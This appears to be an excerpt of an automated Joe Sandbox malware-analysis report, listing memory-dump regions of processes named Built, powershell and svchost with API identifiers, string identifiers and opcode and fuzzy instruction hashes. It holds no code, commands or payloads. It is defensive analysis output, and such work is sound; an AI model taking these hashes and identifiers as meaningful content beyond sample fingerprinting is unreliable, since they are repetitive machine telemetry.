                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                              • Instruction ID: 9dd750388ea1ae7e9e0c287f08b9ac49db762c15d189c90301a240ffe146a3b8
                                                              • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                              • Instruction Fuzzy Hash: 3941A032B18A82C2DB208F25E8453A9A7A1FB88794F404135EA4DC7B99EF3DD401DB42
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: 00007E2002
                                                              • String ID: ..\s\crypto\rand\randfile.c$Filename=
                                                              • API String ID: 1750240854-2201148535
                                                              • Opcode ID: 6b3b0f7a3795f012e9ff1fc1ebc767fdf81fc92d56402ad81cac52365df12dad
                                                              • Instruction ID: 1ef05e60f0307501cbc17bd80c68f7dd6ca87aac8ee6df6fcf71949840e01f9d
                                                              • Opcode Fuzzy Hash: 6b3b0f7a3795f012e9ff1fc1ebc767fdf81fc92d56402ad81cac52365df12dad
                                                              • Instruction Fuzzy Hash: 84317C71B0864682FB20EB55E865AA963A8FF95744F404136EA2D477DDDF3CE508DB00
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID: :
                                                              • API String ID: 1611563598-336475711
                                                              • Opcode ID: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
                                                              • Instruction ID: dc68054cd116e748200abaed3056cc6a73184f056bcf99fd2a0917b809896555
                                                              • Opcode Fuzzy Hash: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
                                                              • Instruction Fuzzy Hash: D821E472A0838286FF209B16D84526E73B1FB84B44F954035DA8C83696DF7EE945DF43
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastgetsockname
                                                              • String ID: ..\s\crypto\bio\b_sock.c
                                                              • API String ID: 566540725-540685895
                                                              • Opcode ID: a7a9d23270d94e37348a85efb9068d8d5f36d2912cc69f144dbe1a5ed76ec5ab
                                                              • Instruction ID: 75731b6400831c0db07851a07a87f8429a6563c99e3c885eb44fe4864504b3e7
                                                              • Opcode Fuzzy Hash: a7a9d23270d94e37348a85efb9068d8d5f36d2912cc69f144dbe1a5ed76ec5ab
                                                              • Instruction Fuzzy Hash: 9B21AC72F0850682E710DB61E821AEA67A4FF80319F904135E66C42AE8DF3DE585DB40
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                              • Instruction ID: 9f2f6502ed7a1bbb3ad87a2f64282b53d1245c60ec3d8c94ba26d750ce038211
                                                              • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                              • Instruction Fuzzy Hash: 25113D32618B8282EB618F15F85026AB7E5FB88B84F584230DF8D47769DF7DD551CB01
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                              • String ID: :
                                                              • API String ID: 2595371189-336475711
                                                              • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                              • Instruction ID: 67339ac808a419b7276d4cba451acde03c84c3de1b5988d905cdff8cbac04b00
                                                              • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                              • Instruction Fuzzy Hash: 4B01442291C28385FF209F60A8662BE77A0FF85748F840036D54DC6691DF2EE554EF17
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastioctlsocket
                                                              • String ID: ..\s\crypto\bio\b_sock.c
                                                              • API String ID: 1021210092-540685895
                                                              • Opcode ID: 4b3498a1bc9275628b4fed3f0116b26741c55f820a8da06fdf06bba4b20f0e59
                                                              • Instruction ID: 12ec0447edf3cee2f57c5b3a60b3995fd694d9f87a1516f3a3479ec1ef932f2f
                                                              • Opcode Fuzzy Hash: 4b3498a1bc9275628b4fed3f0116b26741c55f820a8da06fdf06bba4b20f0e59
                                                              • Instruction Fuzzy Hash: 2CE0D851F1950347F3105B61E834FB52258AF44309F004134E93DC26D9DF3DB1458F00
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1827084664.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_7ffd9b980000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 805a7f2f5b982234f70eed1907b56e22aacd99a6427b34fec1405c05d5283af5
                                                              • Instruction ID: bc6deae47d06e00cf05b68ed14fc0b274122c2730360944b625d4b229bcd9279
                                                              • Opcode Fuzzy Hash: 805a7f2f5b982234f70eed1907b56e22aacd99a6427b34fec1405c05d5283af5
                                                              • Instruction Fuzzy Hash: 10821A22B1FBC91FE766976858256747FE1EF56210B0A01FFD08DCB2E3D9286D068352
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1826305067.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_7ffd9b8b0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 28f421530ecaecbc33d2ad5fc36ca6e9d7acd2863a8725b212077de2c5811254
                                                              • Instruction ID: 51c0901015d6b24b92d6434e9d3263d0fea868d65d7eb62e3fc73b952ed70ea7
                                                              • Opcode Fuzzy Hash: 28f421530ecaecbc33d2ad5fc36ca6e9d7acd2863a8725b212077de2c5811254
                                                              • Instruction Fuzzy Hash: 19422A72B0D66E4FDB55EB6CE8A59E9BBA0FF54324B0502B7C04CC7197DA24A846C7C0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1827084664.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_7ffd9b980000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 16838ec95609661d13c32e0911b48f369d4fd000fa9167b465c7cafd76a646bd
                                                              • Instruction ID: ab3439e2a45b09542c19b658579bd280ebc4a97d28ba17493967c5eec13dc026
                                                              • Opcode Fuzzy Hash: 16838ec95609661d13c32e0911b48f369d4fd000fa9167b465c7cafd76a646bd
                                                              • Instruction Fuzzy Hash: F5D13A31A1FACE1FEBA5DB6898745B57BA1EF52350B0901FED05DCB0E3DA29A904C341
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1826305067.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_7ffd9b8b0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4ead0ecc8a43f53f91cefcab6b20715afb3af999d4b19957bf5eaafd5754118c
                                                              • Instruction ID: 11504d32fc0e949cae02a3ad6c4a3c1ebda483b1f6f2531e3514961e4562050c
                                                              • Opcode Fuzzy Hash: 4ead0ecc8a43f53f91cefcab6b20715afb3af999d4b19957bf5eaafd5754118c
                                                              • Instruction Fuzzy Hash: A941FB71A0DB8C4FDB589B5C9C4A6B97BE0FBA9310F04416FE449D3292CA70A915CBC2
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1823252635.00007FFD9B79D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_7ffd9b79d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 11887c37bf0912e10cb575b066758908847d486629bdea18b7190fee89ff1558
                                                              • Instruction ID: 77d072f54d0192d14e8547d019c3a0445f7ab5b63336935cd2c5dfccdaf5d8b1
                                                              • Opcode Fuzzy Hash: 11887c37bf0912e10cb575b066758908847d486629bdea18b7190fee89ff1558
                                                              • Instruction Fuzzy Hash: 0B41E67140EBC44FE756DB299C519523FF0EF57220B1A06DFD088CB1B7D629A84AC792
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1826305067.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_7ffd9b8b0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ace44e82b7ef487c752304a2622580866a209bf8f742d89659da4a66a1254a08
                                                              • Instruction ID: a348ddc0585bdb89164de9963f59c374d24388b6d38444de48c4d3a5261b1415
                                                              • Opcode Fuzzy Hash: ace44e82b7ef487c752304a2622580866a209bf8f742d89659da4a66a1254a08
                                                              • Instruction Fuzzy Hash: D131E37150CA4C5FDB19DFACD84A7A9BBF0EF65324F04416BD058C7163DA20A41ACB82
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1827084664.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_7ffd9b980000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1318d36a8672dabfbfa9585ad9c01819ad27a6ecb2bb6d11a455b88677ccaf93
                                                              • Instruction ID: d722385c376c47bd923c97c135b8d6991cd1f749060d57dcbb0de00606d4410c
                                                              • Opcode Fuzzy Hash: 1318d36a8672dabfbfa9585ad9c01819ad27a6ecb2bb6d11a455b88677ccaf93
                                                              • Instruction Fuzzy Hash: 2821D522B1ED4B2FE7B9DB5C546137467C1EF94311B5A01BED14ECB6E2DE24ED018241
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1827084664.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_7ffd9b980000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a627cbeb5ab7e682467c2aad181634b0aaf88495a7cd1bbfabdb2b82bf2a6546
                                                              • Instruction ID: 629d6c5d4566ca8f368d5347d897134a36b210c7e2e08172664c5bb4eb898449
                                                              • Opcode Fuzzy Hash: a627cbeb5ab7e682467c2aad181634b0aaf88495a7cd1bbfabdb2b82bf2a6546
                                                              • Instruction Fuzzy Hash: 3011C232B2F94E5FE7B9DA5C94707B877C1EF44320B5A00BDD05DC76A6DD25AD018241
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1826305067.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_7ffd9b8b0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                              • Instruction ID: 9bdfda7ff094c016ee29611a0f36b44afefaafe4c9d5040173e090ca4ad0f1af
                                                              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                              • Instruction Fuzzy Hash: 8701A73120CB0C4FD748EF0CE451AA6B3E0FB89320F10056EE58AC36A1DA32E882CB41
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1826305067.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_7ffd9b8b0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ea7543db342339a8446d0908a6df1c636d44a69e795cc484fab2d145ed1611eb
                                                              • Instruction ID: 9c7b144787e5607bdce7552d8bc797335210b92617a23fabecc4a0fb443b1684
                                                              • Opcode Fuzzy Hash: ea7543db342339a8446d0908a6df1c636d44a69e795cc484fab2d145ed1611eb
                                                              • Instruction Fuzzy Hash: 23F0F63660A68C5FCB52DF2CD8684D57FA0FF6520470A03BBE48CCB162DA229908CBC1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1826305067.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_7ffd9b8b0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: K_^$K_^$K_^$K_^$K_^$K_^
                                                              • API String ID: 0-3805565700
                                                              • Opcode ID: 07a130b8e50a9452fddb9f98e1bb5045bffc7351a94f98e5be6217a1f0ee3175
                                                              • Instruction ID: 340d0eca0231b7bbfa2e4fcba960a7f9bf0f1bac7849aaac107e137054c8742e
                                                              • Opcode Fuzzy Hash: 07a130b8e50a9452fddb9f98e1bb5045bffc7351a94f98e5be6217a1f0ee3175
                                                              • Instruction Fuzzy Hash: 133175B3E0F5E64FE757476818764C62FA0EE2635835F01F6D0D89B1A3F804A9078791
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1826305067.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_7ffd9b8b0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: K_^$K_^$K_^$K_^
                                                              • API String ID: 0-4267328068
                                                              • Opcode ID: 6392175037b7ab2e7c98ea3854f93493f2a6a04dd8c6ee7b002da9133cfa7346
                                                              • Instruction ID: 67855f35240d0ef9b469fbdc09c921f53b7b0e275b4ec0720a23b588d6fbc611
                                                              • Opcode Fuzzy Hash: 6392175037b7ab2e7c98ea3854f93493f2a6a04dd8c6ee7b002da9133cfa7346
                                                              • Instruction Fuzzy Hash: 431163A3A0E6EA4BE766566918761D13FD0AF2625CB4B01F3D4A88F0B3F908290746C5
                                                              Memory Dump Source
                                                              • Source File: 00000050.00000002.1914489284.00007FF6C6B91000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF6C6B90000, based on PE: true
                                                              • Associated: 00000050.00000002.1914426169.00007FF6C6B90000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                              • Associated: 00000050.00000002.1914614843.00007FF6C6B9D000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                              • Associated: 00000050.00000002.1914647700.00007FF6C6BA1000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                              • Associated: 00000050.00000002.1915080882.00007FF6C6E20000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                              • Associated: 00000050.00000002.1915448227.00007FF6C7096000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                              • Associated: 00000050.00000002.1915494007.00007FF6C709A000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_80_2_7ff6c6b90000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 42430f2344ef8e2c73b5046c9819b9514e03832da236caddbb8b9f06a9f0945f
                                                              • Instruction ID: d7f16771795aac4fcc6d16fbe5a7a74512de2d8c8e6349a02c11793fc0e33dd8
                                                              • Opcode Fuzzy Hash: 42430f2344ef8e2c73b5046c9819b9514e03832da236caddbb8b9f06a9f0945f
                                                              • Instruction Fuzzy Hash: 5AB01230D0571984E3032F02D84135833B06B3B787F400030C54C43362CE7F50714B14
                                                              Memory Dump Source
                                                              • Source File: 00000064.00000002.2027886935.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_100_2_7ffd9bb70000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a4291c6e68dce023342cbb1bb47b55b89ddf44d3484d760afedec88263a44b8f
                                                              • Instruction ID: aab93fc78f965d6b7a6f024ae089ce6b5fa884923e933ab63e19104f03c3c395
                                                              • Opcode Fuzzy Hash: a4291c6e68dce023342cbb1bb47b55b89ddf44d3484d760afedec88263a44b8f
                                                              • Instruction Fuzzy Hash: 3B323722B0EACD0FE7669B6848B55B47BE1EF56214B0901FBD08DCB5E3D918AD06C351
                                                              Memory Dump Source
                                                              • Source File: 00000064.00000002.2027015207.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_100_2_7ffd9baa0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4da5cee81f7e0d34698eb2e94d276000709b4becc08576b14f242b0afe5b47f9
                                                              • Instruction ID: eaa61ef321640fa2cb7030be5740960095bd2829e4bb9ddfeb6a9d5ba9d5110a
                                                              • Opcode Fuzzy Hash: 4da5cee81f7e0d34698eb2e94d276000709b4becc08576b14f242b0afe5b47f9
                                                              • Instruction Fuzzy Hash: 1671B231E0964D4FDB55DB68D8616EC7BF1EF5A314F1441BEE049D72A2CE35A802CB50
                                                              Memory Dump Source
                                                              • Source File: 00000064.00000002.2027886935.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_100_2_7ffd9bb70000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 19f3311f708de58053f31d8b9c144f47cbb342982eb7dc3a571c525bbf9df74e
                                                              • Instruction ID: 8ecac880ed625e79e3fe9f301733e65cb8a1062deaeb7b6dc8f57d1a0c6f177c
                                                              • Opcode Fuzzy Hash: 19f3311f708de58053f31d8b9c144f47cbb342982eb7dc3a571c525bbf9df74e
                                                              • Instruction Fuzzy Hash: 6021E433B0EA5D0FEBB1969C68655B873D1EF54B68F5901BBD04DC35E2DD08AD058381
                                                              Memory Dump Source
                                                              • Source File: 00000064.00000002.2027015207.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_100_2_7ffd9baa0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                              • Instruction ID: bdda0109228a190c12742b9e7315728e2f6bb354b6803920c3f62299af715007
